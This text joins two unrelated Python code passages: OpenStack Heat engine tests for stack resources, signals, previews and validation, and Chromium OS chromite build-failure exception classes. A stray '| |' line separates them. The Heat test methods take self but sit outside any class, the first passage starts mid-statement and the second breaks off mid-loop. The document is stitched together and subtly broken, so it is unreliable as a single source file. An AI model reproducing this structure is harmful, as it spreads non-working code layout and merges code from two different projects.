                           self.ctx, non_exist_identifier, 'WebServer')
    self.assertEqual(exception.StackNotFound, ex.exc_info[0])

@tools.stack_context('find_phys_res_stack')
def test_find_physical_resource(self):
    """find_physical_resource maps a physical id back to its resource."""
    resources = self.eng.describe_stack_resources(self.ctx,
                                                  self.stack.identifier(),
                                                  None)
    phys_id = resources[0]['physical_resource_id']
    result = self.eng.find_physical_resource(self.ctx, phys_id)
    self.assertIsInstance(result, dict)
    # The result must round-trip into a ResourceIdentifier.
    resource_identity = identifier.ResourceIdentifier(**result)
    self.assertEqual(self.stack.identifier(), resource_identity.stack())
    self.assertEqual('WebServer', resource_identity.resource_name)

def test_find_physical_resource_nonexist(self):
    """An unknown physical id raises PhysicalResourceNotFound."""
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.find_physical_resource,
                           self.ctx, 'foo')
    self.assertEqual(exception.PhysicalResourceNotFound, ex.exc_info[0])
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_list(self):
    """list_stack_resources returns the summary fields per resource."""
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(self.ctx,
                      stack=mox.IgnoreArg()).AndReturn(self.stack)
    self.m.ReplayAll()
    resources = self.eng.list_stack_resources(self.ctx,
                                              self.stack.identifier())
    self.assertEqual(1, len(resources))
    r = resources[0]
    self.assertIn('resource_identity', r)
    self.assertIn('updated_time', r)
    self.assertIn('physical_resource_id', r)
    self.assertIn('resource_name', r)
    self.assertEqual('WebServer', r['resource_name'])
    self.assertIn('resource_status', r)
    self.assertIn('resource_status_reason', r)
    self.assertIn('resource_type', r)
    self.m.VerifyAll()

@mock.patch.object(parser.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_depth')
def test_stack_resources_list_with_depth(self, mock_load):
    """A requested nested depth is passed through to iter_resources."""
    mock_load.return_value = self.stack
    resources = six.itervalues(self.stack)
    self.stack.iter_resources = mock.Mock(return_value=resources)
    resources = self.eng.list_stack_resources(self.ctx,
                                              self.stack.identifier(),
                                              2)
    self.stack.iter_resources.assert_called_once_with(2)

@mock.patch.object(parser.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_max_depth')
def test_stack_resources_list_with_max_depth(self, mock_load):
    """A depth beyond the limit is clamped to max_nested_stack_depth."""
    mock_load.return_value = self.stack
    resources = six.itervalues(self.stack)
    self.stack.iter_resources = mock.Mock(return_value=resources)
    resources = self.eng.list_stack_resources(self.ctx,
                                              self.stack.identifier(),
                                              99)
    max_depth = cfg.CONF.max_nested_stack_depth
    self.stack.iter_resources.assert_called_once_with(max_depth)

@mock.patch.object(parser.Stack, 'load')
def test_stack_resources_list_deleted_stack(self, mock_load):
    """Resources of a deleted stack are still listed as DELETE/COMPLETE."""
    stack = tools.setup_stack('resource_list_deleted_stack', self.ctx)
    stack_id = stack.identifier()
    mock_load.return_value = stack
    tools.clean_up_stack(stack)
    resources = self.eng.list_stack_resources(self.ctx, stack_id)
    self.assertEqual(1, len(resources))
    res = resources[0]
    self.assertEqual('DELETE', res['resource_action'])
    self.assertEqual('COMPLETE', res['resource_status'])

def test_stack_resources_list_nonexist_stack(self):
    """Listing resources of an unknown stack raises StackNotFound."""
    non_exist_identifier = identifier.HeatIdentifier(
        self.ctx.tenant_id, 'wibble',
        '18d06e2e-44d3-4bef-9fbf-52480d604b02')
    stack_not_found_exc = exception.StackNotFound(stack_name='test')
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    service.EngineService._get_stack(
        self.ctx, non_exist_identifier, show_deleted=True
    ).AndRaise(stack_not_found_exc)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.list_stack_resources,
                           self.ctx, non_exist_identifier)
    self.assertEqual(exception.StackNotFound, ex.exc_info[0])
    self.m.VerifyAll()
def _stack_create(self, stack_name):
    """Create and store a policy-template stack, stubbing _get_stack.

    Returns the created parser.Stack; _get_stack is stubbed to return the
    corresponding DB record for one call.
    """
    stack = tools.get_stack(stack_name, self.ctx, policy_template)
    tools.setup_keystone_mocks(self.m, stack)
    self.m.ReplayAll()
    stack.store()
    stack.create()
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    s = stack_object.Stack.get_by_id(self.ctx, stack.id)
    service.EngineService._get_stack(self.ctx,
                                     stack.identifier()).AndReturn(s)
    self.m.ReplayAll()
    return stack
def test_signal_reception_async(self):
    """resource_signal without sync_call dispatches to a worker thread."""
    self.eng.thread_group_mgr = tools.DummyThreadGroupMgrLogStart()
    stack_name = 'signal_reception_async'
    self.stack = self._stack_create(stack_name)
    test_data = {'food': 'yum'}
    self.m.ReplayAll()
    self.eng.resource_signal(self.ctx,
                             dict(self.stack.identifier()),
                             'WebServerScaleDownPolicy',
                             test_data)
    # The dummy thread-group manager records what was started.
    self.assertEqual([(self.stack.id, mox.IgnoreArg())],
                     self.eng.thread_group_mgr.started)
    self.m.VerifyAll()

def test_signal_reception_sync(self):
    """With sync_call=True the resource is signalled in-line."""
    stack_name = 'signal_reception_sync'
    self.stack = self._stack_create(stack_name)
    test_data = {'food': 'yum'}
    self.m.StubOutWithMock(res.Resource, 'signal')
    res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
    self.m.ReplayAll()
    self.eng.resource_signal(self.ctx,
                             dict(self.stack.identifier()),
                             'WebServerScaleDownPolicy',
                             test_data,
                             sync_call=True)
    self.m.VerifyAll()

def test_signal_reception_no_resource(self):
    """Signalling a missing resource raises ResourceNotFound."""
    stack_name = 'signal_reception_no_resource'
    self.stack = self._stack_create(stack_name)
    test_data = {'food': 'yum'}
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.resource_signal, self.ctx,
                           dict(self.stack.identifier()),
                           'resource_does_not_exist',
                           test_data)
    self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
    self.m.VerifyAll()

def test_signal_reception_unavailable_resource(self):
    """Signalling a stored-but-never-created stack's resource fails with
    ResourceNotAvailable."""
    stack_name = 'signal_reception_unavailable_resource'
    stack = tools.get_stack(stack_name, self.ctx, policy_template)
    stack.store()
    self.stack = stack
    self.m.StubOutWithMock(parser.Stack, 'load')
    parser.Stack.load(
        self.ctx, stack=mox.IgnoreArg(),
        use_stored_context=mox.IgnoreArg()
    ).AndReturn(self.stack)
    self.m.ReplayAll()
    test_data = {'food': 'yum'}
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
    service.EngineService._get_stack(self.ctx,
                                     self.stack.identifier()).AndReturn(s)
    self.m.ReplayAll()
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.resource_signal, self.ctx,
                           dict(self.stack.identifier()),
                           'WebServerScaleDownPolicy',
                           test_data)
    self.assertEqual(exception.ResourceNotAvailable, ex.exc_info[0])
    self.m.VerifyAll()
def test_signal_returns_metadata(self):
    """A synchronous signal returns the resource's current metadata."""
    self.stack = self._stack_create('signal_reception')
    rsrc = self.stack['WebServerScaleDownPolicy']
    test_metadata = {'food': 'yum'}
    rsrc.metadata_set(test_metadata)
    self.m.StubOutWithMock(res.Resource, 'signal')
    res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
    self.m.ReplayAll()
    md = self.eng.resource_signal(self.ctx,
                                  dict(self.stack.identifier()),
                                  'WebServerScaleDownPolicy', None,
                                  sync_call=True)
    self.assertEqual(test_metadata, md)
    self.m.VerifyAll()

def test_signal_unset_invalid_hook(self):
    """Unsetting an unknown hook type raises InvalidBreakPointHook."""
    self.stack = self._stack_create('signal_unset_invalid_hook')
    details = {'unset_hook': 'invalid_hook'}
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.resource_signal,
                           self.ctx,
                           dict(self.stack.identifier()),
                           'WebServerScaleDownPolicy',
                           details)
    msg = 'Invalid hook type "invalid_hook"'
    self.assertIn(msg, six.text_type(ex.exc_info[1]))
    self.assertEqual(exception.InvalidBreakPointHook,
                     ex.exc_info[0])
    self.m.VerifyAll()

def test_signal_unset_not_defined_hook(self):
    """Unsetting a valid but undefined hook raises InvalidBreakPointHook."""
    self.stack = self._stack_create('signal_unset_not_defined_hook')
    details = {'unset_hook': 'pre-update'}
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self.eng.resource_signal,
                           self.ctx,
                           dict(self.stack.identifier()),
                           'WebServerScaleDownPolicy',
                           details)
    msg = ('The "pre-update" hook is not defined on '
           'AWSScalingPolicy "WebServerScaleDownPolicy"')
    self.assertIn(msg, six.text_type(ex.exc_info[1]))
    self.assertEqual(exception.InvalidBreakPointHook,
                     ex.exc_info[0])
    self.m.VerifyAll()
def test_signal_calls_metadata_update(self):
    """By default a signal also triggers a resource metadata update."""
    stack = tools.get_stack('signal_reception', self.ctx, policy_template)
    self.stack = stack
    tools.setup_keystone_mocks(self.m, stack)
    self.m.ReplayAll()
    stack.store()
    stack.create()
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
    service.EngineService._get_stack(self.ctx,
                                     self.stack.identifier()).AndReturn(s)
    self.m.StubOutWithMock(res.Resource, 'signal')
    res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
    self.m.StubOutWithMock(res.Resource, 'metadata_update')
    # this will be called once for the Random resource
    res.Resource.metadata_update().AndReturn(None)
    self.m.ReplayAll()
    self.eng.resource_signal(self.ctx,
                             dict(self.stack.identifier()),
                             'WebServerScaleDownPolicy', None,
                             sync_call=True)
    self.m.VerifyAll()
def test_signal_no_calls_metadata_update(self):
    """A signal must not trigger metadata_update when
    signal_needs_metadata_updates is disabled on the Resource class."""
    stack = tools.get_stack('signal_reception', self.ctx, policy_template)
    self.stack = stack
    tools.setup_keystone_mocks(self.m, stack)
    self.m.ReplayAll()
    stack.store()
    stack.create()
    res.Resource.signal_needs_metadata_updates = False
    # Restore the class attribute even if an assertion or mox verification
    # below fails; the original trailing reassignment only ran on success,
    # leaking False into subsequently-run tests.
    self.addCleanup(setattr, res.Resource,
                    'signal_needs_metadata_updates', True)
    self.m.StubOutWithMock(service.EngineService, '_get_stack')
    s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
    service.EngineService._get_stack(self.ctx,
                                     self.stack.identifier()).AndReturn(s)
    self.m.StubOutWithMock(res.Resource, 'signal')
    res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
    # metadata_update is stubbed with no expectation recorded, so any call
    # to it fails VerifyAll().
    self.m.StubOutWithMock(res.Resource, 'metadata_update')
    self.m.ReplayAll()
    self.eng.resource_signal(self.ctx,
                             dict(self.stack.identifier()),
                             'WebServerScaleDownPolicy', None,
                             sync_call=True)
    self.m.VerifyAll()
def test_stack_list_all_empty(self):
    """With no stacks stored, list_stacks returns an empty list."""
    stacks = self.eng.list_stacks(self.ctx)
    self.assertEqual(0, len(stacks))

def test_stack_describe_all_empty(self):
    """With no stacks stored, show_stack(None) returns an empty list."""
    described = self.eng.show_stack(self.ctx, None)
    self.assertEqual(0, len(described))
def test_lazy_load_resources(self):
    """Stack resources/dependencies are not built until first access."""
    stack_name = 'lazy_load_test'
    lazy_load_template = {
        'HeatTemplateFormatVersion': '2012-12-12',
        'Resources': {
            'foo': {'Type': 'GenericResourceType'},
            'bar': {
                'Type': 'ResourceWithPropsType',
                'Properties': {
                    'Foo': {'Ref': 'foo'},
                }
            }
        }
    }
    templ = templatem.Template(lazy_load_template)
    stack = parser.Stack(self.ctx, stack_name, templ)
    # Nothing has been materialised yet.
    self.assertIsNone(stack._resources)
    self.assertIsNone(stack._dependencies)
    # First attribute access builds the resource map.
    resources = stack.resources
    self.assertIsInstance(resources, dict)
    self.assertEqual(2, len(resources))
    self.assertIsInstance(resources.get('foo'),
                          generic_rsrc.GenericResource)
    self.assertIsInstance(resources.get('bar'),
                          generic_rsrc.ResourceWithProps)
    stack_dependencies = stack.dependencies
    self.assertIsInstance(stack_dependencies, dependencies.Dependencies)
    self.assertEqual(2, len(stack_dependencies.graph()))
def _preview_stack(self):
    """Build a two-resource sample stack and run preview_stack on it."""
    res._register_class('GenericResource1', generic_rsrc.GenericResource)
    res._register_class('GenericResource2', generic_rsrc.GenericResource)
    args = {}
    params = {}
    files = None
    stack_name = 'SampleStack'
    tpl = {'HeatTemplateFormatVersion': '2012-12-12',
           'Description': 'Lorem ipsum.',
           'Resources': {
               'SampleResource1': {'Type': 'GenericResource1'},
               'SampleResource2': {'Type': 'GenericResource2'}}}
    return self.eng.preview_stack(self.ctx, stack_name, tpl,
                                  params, files, args)
def test_preview_stack_returns_a_stack(self):
    """The preview result carries identity, name and description."""
    stack = self._preview_stack()
    # An unsaved stack previews with stack_id 'None'.
    expected_identity = {'path': '',
                         'stack_id': 'None',
                         'stack_name': 'SampleStack',
                         'tenant': 'stack_service_test_tenant'}
    self.assertEqual(expected_identity, stack['stack_identity'])
    self.assertEqual('SampleStack', stack['stack_name'])
    self.assertEqual('Lorem ipsum.', stack['description'])

def test_preview_stack_returns_list_of_resources_in_stack(self):
    """The preview lists both sample resources with type and name."""
    stack = self._preview_stack()
    self.assertIsInstance(stack['resources'], list)
    self.assertEqual(2, len(stack['resources']))
    resource_types = set(r['resource_type'] for r in stack['resources'])
    self.assertIn('GenericResource1', resource_types)
    self.assertIn('GenericResource2', resource_types)
    resource_names = set(r['resource_name'] for r in stack['resources'])
    self.assertIn('SampleResource1', resource_names)
    self.assertIn('SampleResource2', resource_names)

def test_preview_stack_validates_new_stack(self):
    """Preview runs new-stack validation and surfaces StackExists."""
    exc = exception.StackExists(stack_name='Validation Failed')
    self.eng._validate_new_stack = mock.Mock(side_effect=exc)
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self._preview_stack)
    self.assertEqual(exception.StackExists, ex.exc_info[0])

@mock.patch.object(service.api, 'format_stack_preview', new=mock.Mock())
@mock.patch.object(service.parser, 'Stack')
def test_preview_stack_checks_stack_validity(self, mock_parser):
    """Preview surfaces template validation failures."""
    exc = exception.StackValidationFailed(message='Validation Failed')
    mock_parsed_stack = mock.Mock()
    mock_parsed_stack.validate.side_effect = exc
    mock_parser.return_value = mock_parsed_stack
    ex = self.assertRaises(dispatcher.ExpectedException,
                           self._preview_stack)
    self.assertEqual(exception.StackValidationFailed, ex.exc_info[0])
@mock.patch.object(stack_object.Stack, 'get_by_name')
def test_validate_new_stack_checks_existing_stack(self, mock_stack_get):
    """A name collision with an existing stack raises StackExists."""
    mock_stack_get.return_value = 'existing_db_stack'
    tmpl = templatem.Template(
        {'HeatTemplateFormatVersion': '2012-12-12'})
    self.assertRaises(exception.StackExists, self.eng._validate_new_stack,
                      self.ctx, 'test_existing_stack', tmpl)

@mock.patch.object(stack_object.Stack, 'count_all')
def test_validate_new_stack_checks_stack_limit(self, mock_db_count):
    """Reaching max_stacks_per_tenant raises RequestLimitExceeded."""
    cfg.CONF.set_override('max_stacks_per_tenant', 99)
    mock_db_count.return_value = 99
    template = templatem.Template(
        {'HeatTemplateFormatVersion': '2012-12-12'})
    self.assertRaises(exception.RequestLimitExceeded,
                      self.eng._validate_new_stack,
                      self.ctx, 'test_existing_stack', template)

def test_validate_new_stack_checks_incorrect_keywords_in_resource(self):
    """A cfn-style 'Type' key inside a HOT resource fails validation."""
    template = {'heat_template_version': '2013-05-23',
                'resources': {
                    'Res': {'Type': 'GenericResource1'}}}
    parsed_template = templatem.Template(template)
    ex = self.assertRaises(exception.StackValidationFailed,
                           self.eng._validate_new_stack,
                           self.ctx, 'test_existing_stack',
                           parsed_template)
    msg = (u'"Type" is not a valid keyword '
           'inside a resource definition')
    self.assertEqual(msg, six.text_type(ex))

def test_validate_new_stack_checks_incorrect_sections(self):
    """An unknown top-level template section fails validation."""
    template = {'heat_template_version': '2013-05-23',
                'unknown_section': {
                    'Res': {'Type': 'GenericResource1'}}}
    parsed_template = templatem.Template(template)
    ex = self.assertRaises(exception.StackValidationFailed,
                           self.eng._validate_new_stack,
                           self.ctx, 'test_existing_stack',
                           parsed_template)
    msg = u'The template section is invalid: unknown_section'
    self.assertEqual(msg, six.text_type(ex))

def test_validate_new_stack_checks_resource_limit(self):
    """Exceeding max_resources_per_stack raises RequestLimitExceeded."""
    cfg.CONF.set_override('max_resources_per_stack', 5)
    template = {'HeatTemplateFormatVersion': '2012-12-12',
                'Resources': {
                    'Res1': {'Type': 'GenericResource1'},
                    'Res2': {'Type': 'GenericResource1'},
                    'Res3': {'Type': 'GenericResource1'},
                    'Res4': {'Type': 'GenericResource1'},
                    'Res5': {'Type': 'GenericResource1'},
                    'Res6': {'Type': 'GenericResource1'}}}
    parsed_template = templatem.Template(template)
    self.assertRaises(exception.RequestLimitExceeded,
                      self.eng._validate_new_stack,
                      self.ctx, 'test_existing_stack', parsed_template)

def test_validate_new_stack_handle_assertion_error(self):
    """An AssertionError from template validation propagates unchanged."""
    tmpl = mock.MagicMock()
    expected_message = 'Expected assertion error'
    tmpl.validate.side_effect = AssertionError(expected_message)
    exc = self.assertRaises(AssertionError, self.eng._validate_new_stack,
                            self.ctx, 'stack_name', tmpl)
    self.assertEqual(expected_message, six.text_type(exc))
@mock.patch('heat.engine.service.ThreadGroupManager',
            return_value=mock.Mock())
@mock.patch.object(stack_object.Stack, 'get_all')
@mock.patch('heat.engine.stack_lock.StackLock',
            return_value=mock.Mock())
@mock.patch.object(parser.Stack, 'load')
@mock.patch.object(context, 'get_admin_context')
def test_engine_reset_stack_status(
        self,
        mock_admin_context,
        mock_stack_load,
        mock_stacklock,
        mock_get_all,
        mock_thread):
    """reset_stack_status loads IN_PROGRESS stacks with the admin context
    and schedules them to be marked failed under an acquired lock."""
    mock_admin_context.return_value = self.ctx
    # DB record for a stack stuck IN_PROGRESS.
    db_stack = mock.MagicMock()
    db_stack.id = 'foo'
    db_stack.status = 'IN_PROGRESS'
    db_stack.status_reason = None
    mock_get_all.return_value = [db_stack]
    fake_stack = mock.MagicMock()
    fake_stack.action = 'CREATE'
    fake_stack.id = 'foo'
    fake_stack.status = 'IN_PROGRESS'
    mock_stack_load.return_value = fake_stack
    # Fake lock reports a different engine id and acquires successfully.
    fake_lock = mock.MagicMock()
    fake_lock.get_engine_id.return_value = 'old-engine'
    fake_lock.acquire.return_value = None
    mock_stacklock.return_value = fake_lock
    self.eng.thread_group_mgr = mock_thread
    self.eng.reset_stack_status()
    mock_admin_context.assert_called_once_with()
    # Only IN_PROGRESS stacks are queried, across all tenants.
    filters = {'status': parser.Stack.IN_PROGRESS}
    mock_get_all.assert_called_once_with(self.ctx,
                                         filters=filters,
                                         tenant_safe=False)
    mock_stack_load.assert_called_once_with(self.ctx,
                                            stack=db_stack,
                                            use_stored_context=True)
    mock_thread.start_with_acquired_lock.assert_called_once_with(
        fake_stack, fake_lock,
        self.eng.set_stack_and_resource_to_failed, fake_stack
    )
def test_set_stack_and_resource_to_failed(self):
    """Only IN_PROGRESS resources are moved to FAILED; others keep state."""
    def fake_stack():
        # Stack stand-in whose state_set records the new action/status.
        stk = mock.MagicMock()
        stk.action = 'CREATE'
        stk.id = 'foo'
        stk.status = 'IN_PROGRESS'
        stk.FAILED = 'FAILED'

        def mock_stack_state_set(a, s, reason):
            stk.status = s
            stk.action = a
            stk.status_reason = reason
        stk.state_set = mock_stack_state_set
        return stk

    def fake_stack_resource(name, action, status):
        # Resource stand-in with a recording state_set.
        rs = mock.MagicMock()
        rs.name = name
        rs.action = action
        rs.status = status
        rs.IN_PROGRESS = 'IN_PROGRESS'
        rs.FAILED = 'FAILED'

        def mock_resource_state_set(a, s, reason='engine_down'):
            rs.status = s
            rs.action = a
            rs.status_reason = reason
        rs.state_set = mock_resource_state_set
        return rs

    test_stack = fake_stack()
    test_stack.resources = {
        'r1': fake_stack_resource('r1', 'UPDATE', 'COMPLETE'),
        'r2': fake_stack_resource('r2', 'UPDATE', 'IN_PROGRESS'),
        'r3': fake_stack_resource('r3', 'UPDATE', 'FAILED')}
    self.eng.set_stack_and_resource_to_failed(test_stack)
    self.assertEqual('FAILED', test_stack.status)
    self.assertEqual('COMPLETE', test_stack.resources.get('r1').status)
    self.assertEqual('FAILED', test_stack.resources.get('r2').status)
    self.assertEqual('FAILED', test_stack.resources.get('r3').status)
| |
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Classes of failure types."""
import collections
import functools
import sys
import traceback

from chromite.cbuildbot import portage_utilities
from chromite.lib import cros_build_lib
class StepFailure(Exception):
  """StepFailure exceptions indicate that a cbuildbot step failed.

  Exceptions that derive from StepFailure should meet the following
  criteria:
    1) The failure indicates that a cbuildbot step failed.
    2) The necessary information to debug the problem has already been
       printed in the logs for the stage that failed.
    3) __str__() should be brief enough to include in a Commit Queue
       failure message.
  """

  def __init__(self, message=''):
    """Constructor.

    Args:
      message: An error message.
    """
    Exception.__init__(self, message)
    # Store the message explicitly: BaseException.message was removed in
    # Python 3, but __str__ below (and subclasses such as CompoundFailure)
    # read self.message.
    self.message = message
    self.args = (message,)

  def __str__(self):
    """Stringify the message."""
    return self.message
# A namedtuple holding information about one exception: its class, its
# string representation, and the formatted traceback text.
ExceptInfo = collections.namedtuple(
    'ExceptInfo', ['type', 'str', 'traceback'])


def CreateExceptInfo(exception, tb):
  """Creates a list of ExceptInfo objects from |exception| and |tb|.

  If |exception| is a CompoundFailure with a non-empty list of exc_infos,
  simply returns exception.exc_infos. Note that we do not preserve the type
  of |exception| in this case.

  Args:
    exception: The exception.
    tb: The textual traceback.

  Returns:
    A list of ExceptInfo objects.
  """
  # isinstance is the idiomatic, equivalent form of the original
  # issubclass(exception.__class__, CompoundFailure) check.
  if isinstance(exception, CompoundFailure) and exception.exc_infos:
    return exception.exc_infos

  return [ExceptInfo(exception.__class__, str(exception), tb)]
class CompoundFailure(StepFailure):
  """A StepFailure that bundles a list of ExceptInfo objects."""

  def __init__(self, message='', exc_infos=None):
    """Initializes a CompoundFailure instance.

    Args:
      message: A string describing the failure.
      exc_infos: A list of ExceptInfo objects.
    """
    self.exc_infos = exc_infos or []
    if not message:
      # Default message: one "type: str" line per recorded exception.
      lines = ['%s: %s' % (info.type, info.str) for info in self.exc_infos]
      message = '\n'.join(lines)

    super(CompoundFailure, self).__init__(message=message)

  def ToFullMessage(self):
    """Returns a string with all information in self.exc_infos."""
    if self.HasEmptyList():
      # No exception details recorded; fall back to the plain message.
      return self.message

    # Include the textual traceback(s).
    parts = ['{e.type}: {e.str}\n{e.traceback}'.format(e=info)
             for info in self.exc_infos]
    return '\n'.join(parts)

  def HasEmptyList(self):
    """Returns True if self.exc_infos is empty."""
    return len(self.exc_infos) == 0

  def HasFailureType(self, cls):
    """Returns True if any recorded failure is a (subclass of) |cls|."""
    for info in self.exc_infos:
      if issubclass(info.type, cls):
        return True

    return False

  def MatchesFailureType(self, cls):
    """Returns True if every recorded failure is a (subclass of) |cls|."""
    if self.HasEmptyList():
      return False

    return all(issubclass(info.type, cls) for info in self.exc_infos)

  def HasFatalFailure(self, whitelist=None):
    """Determine if there are non-whitelisted failures.

    Args:
      whitelist: A list of whitelisted exception types.

    Returns:
      True if any failure is not in |whitelist|.
    """
    if not whitelist:
      return not self.HasEmptyList()

    return any(all(not issubclass(info.type, cls) for cls in whitelist)
               for info in self.exc_infos)
class SetFailureType(object):
  """A decorator to re-raise exceptions as a pre-set CompoundFailure type."""

  def __init__(self, category_exception, source_exception=None):
    """Initializes the decorator.

    Args:
      category_exception: The exception type to re-raise as. It must be
        a subclass of CompoundFailure.
      source_exception: The exception types to re-raise. By default, re-raise
        all Exception classes.
    """
    assert issubclass(category_exception, CompoundFailure)
    self.category_exception = category_exception
    self.source_exception = source_exception
    if self.source_exception is None:
      self.source_exception = Exception

  def __call__(self, functor):
    """Returns a wrapped function."""
    # functools.wraps preserves the wrapped function's name/docstring,
    # which the original wrapper silently discarded.
    @functools.wraps(functor)
    def wrapped_functor(*args, **kwargs):
      try:
        return functor(*args, **kwargs)
      except self.source_exception:
        # Get the information about the original exception.
        exc_type, exc_value, _ = sys.exc_info()
        exc_traceback = traceback.format_exc()
        if issubclass(exc_type, self.category_exception):
          # Do not re-raise if the exception is already a subclass of the
          # set exception type, because it offers more information.
          raise
        else:
          exc_infos = CreateExceptInfo(exc_value, exc_traceback)
          raise self.category_exception(exc_infos=exc_infos)

    return wrapped_functor
class RetriableStepFailure(StepFailure):
    """This exception is thrown when a step failed, but should be retried.

    NOTE(review): nothing in this class performs a retry itself; whatever
    catches it is responsible for re-running the step.
    """
class BuildScriptFailure(StepFailure):
    """Thrown when a build command failed.

    Provides a short summary of what command failed, for usage in failure
    messages from the Commit Queue, so that developers aren't spammed with
    giant error messages when common commands (e.g. build_packages) fail.
    """

    def __init__(self, exception, shortname):
        """Construct a BuildScriptFailure object.

        Args:
            exception: A RunCommandError object.
            shortname: Short name for the command we're running.
        """
        StepFailure.__init__(self)
        assert isinstance(exception, cros_build_lib.RunCommandError)
        self.exception = exception
        self.shortname = shortname
        # Keep args in sync for pickling/re-raising.
        self.args = (exception, shortname)

    def __str__(self):
        """Summarize the build command failure briefly."""
        returncode = self.exception.result.returncode
        if returncode:
            return '%s failed (code=%s)' % (self.shortname, returncode)
        # Command "succeeded" by exit code; fall back to the error message.
        return self.exception.msg
class PackageBuildFailure(BuildScriptFailure):
    """Thrown when one or more packages fail to build."""

    def __init__(self, exception, shortname, failed_packages):
        """Construct a PackageBuildFailure object.

        Args:
            exception: The underlying exception.
            shortname: Short name for the command we're running.
            failed_packages: List of packages that failed to build.
        """
        BuildScriptFailure.__init__(self, exception, shortname)
        self.failed_packages = set(failed_packages)
        # Keep args in sync for pickling/re-raising.
        self.args = (exception, shortname, failed_packages)

    def __str__(self):
        package_names = ' '.join(sorted(self.failed_packages))
        return 'Packages failed in %s: %s' % (self.shortname, package_names)
# Taxonomy of infrastructure-related CompoundFailures, grouped by the service
# that caused them. Raising the most specific subclass lets callers classify
# failures with HasFailureType/MatchesFailureType.
class InfrastructureFailure(CompoundFailure):
    """Raised if a stage fails due to infrastructure issues."""


# Chrome OS Test Lab failures.
class TestLabFailure(InfrastructureFailure):
    """Raised if a stage fails due to hardware lab infrastructure issues."""


# Gerrit-on-Borg failures.
class GoBFailure(InfrastructureFailure):
    """Raised if a stage fails due to Gerrit-on-Borg (GoB) issues."""


class GoBQueryFailure(GoBFailure):
    """Raised if a stage fails due to Gerrit-on-Borg (GoB) query errors."""


class GoBSubmitFailure(GoBFailure):
    """Raised if a stage fails due to Gerrit-on-Borg (GoB) submission errors."""


class GoBFetchFailure(GoBFailure):
    """Raised if a stage fails due to Gerrit-on-Borg (GoB) fetch errors."""


# Google Storage failures.
class GSFailure(InfrastructureFailure):
    """Raised if a stage fails due to Google Storage (GS) issues."""


class GSUploadFailure(GSFailure):
    """Raised if a stage fails due to Google Storage (GS) upload issues."""


class GSDownloadFailure(GSFailure):
    """Raised if a stage fails due to Google Storage (GS) download issues."""


# Builder failures.
class BuilderFailure(InfrastructureFailure):
    """Raised if a stage fails due to builder issues."""


# Crash collection service failures.
class CrashCollectionFailure(InfrastructureFailure):
    """Raised if a stage fails due to crash collection services."""
class BuildFailureMessage(object):
    """Message indicating that changes failed to be validated.

    Attributes:
        message: Human-readable failure description.
        tracebacks: Tuple of per-builder traceback records; each entry is
            expected to expose an ``exception`` attribute.
        internal: Whether this failure occurred on an internal builder.
        reason: A string describing the failure.
        builder: The builder the failure occurred on.
    """

    def __init__(self, message, tracebacks, internal, reason, builder):
        """Create a BuildFailureMessage object.

        Args:
            message: The message to print.
            tracebacks: Exceptions received by individual builders, if any.
            internal: Whether this failure occurred on an internal builder.
            reason: A string describing the failure.
            builder: The builder the failure occurred on.
        """
        # Convert each of the input arguments into simple Python datastructures
        # (i.e. not generators) that can be easily pickled.
        self.message = str(message)
        self.tracebacks = tuple(tracebacks)
        self.internal = bool(internal)
        self.reason = str(reason)
        self.builder = str(builder)

    def __str__(self):
        return self.message

    def MatchesFailureType(self, cls):
        """Check if all of the tracebacks match the specified failure type."""
        for tb in self.tracebacks:
            if not isinstance(tb.exception, cls):
                if (isinstance(tb.exception, CompoundFailure) and
                        tb.exception.MatchesFailureType(cls)):
                    # A CompoundFailure counts as a match when every one of
                    # its stored exceptions matches |cls|.
                    continue
                return False
        return True

    def HasFailureType(self, cls):
        """Check if any of the failures match the specified failure type."""
        for tb in self.tracebacks:
            if isinstance(tb.exception, cls):
                return True
            if (isinstance(tb.exception, CompoundFailure) and
                    tb.exception.HasFailureType(cls)):
                # A CompoundFailure counts when any of its stored exceptions
                # matches |cls|.
                return True
        return False

    def IsPackageBuildFailure(self):
        """Check if all of the failures are package build failures."""
        return self.MatchesFailureType(PackageBuildFailure)

    def FindPackageBuildFailureSuspects(self, changes):
        """Figure out what changes probably caused our failures.

        We use a fairly simplistic algorithm to calculate breakage: If you
        changed a package, and that package broke, you probably broke the
        build. If there were multiple changes to a broken package, we fail
        them all.

        Some safeguards are implemented to ensure that bad changes are kicked
        out:
          1) Changes to overlays (e.g. ebuilds, eclasses, etc.) are always
             kicked out if the build fails.
          2) If a package fails that nobody changed, we kick out all of the
             changes.
          3) If any failures occur that we can't explain, we kick out all of
             the changes.

        It is certainly possible to trick this algorithm: e.g. a change to
        libchromeos that breaks power_manager submitted alongside a
        power_manager change will only blame the power_manager change — but
        safeguard #2 catches the libchromeos change on the next run.

        Args:
            changes: List of changes to examine.

        Returns:
            Set of changes that likely caused the failure.
        """
        blame_everything = False
        suspects = set()
        for tb in self.tracebacks:
            # NOTE(review): assumes each exception has .failed_packages, i.e.
            # is a PackageBuildFailure; callers should verify with
            # IsPackageBuildFailure() first.
            for package in tb.exception.failed_packages:
                failed_projects = portage_utilities.FindWorkonProjects([package])
                blame_assigned = False
